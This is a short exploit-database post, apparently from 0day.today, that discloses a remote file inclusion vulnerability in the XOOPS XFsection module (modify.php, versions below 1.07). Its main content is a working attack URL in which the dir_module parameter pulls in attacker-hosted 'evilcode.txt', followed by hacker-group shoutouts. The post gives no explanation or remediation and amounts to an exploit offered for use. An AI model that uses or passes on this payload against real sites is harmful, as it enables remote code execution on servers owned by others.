id: 1946
date: 06/12/2007
title: XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
author: Sp[L]o1T
cves: 

=======================================================================
XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
=======================================================================



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
XOOPS Module XFsection Remote File Inclusion
version: < 1.07
source : http://prdownloads.sourceforge.net/xoops/xoops2-mod_xfsection-107.zip
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Bug : http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Shoutz t0 : Vladiii,Johnny,Shocker,Epic,OSHO,Zapakitul and all members 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Note:
In some cases you will need to be authenticated.


#  0day.today [2023-03-25]  #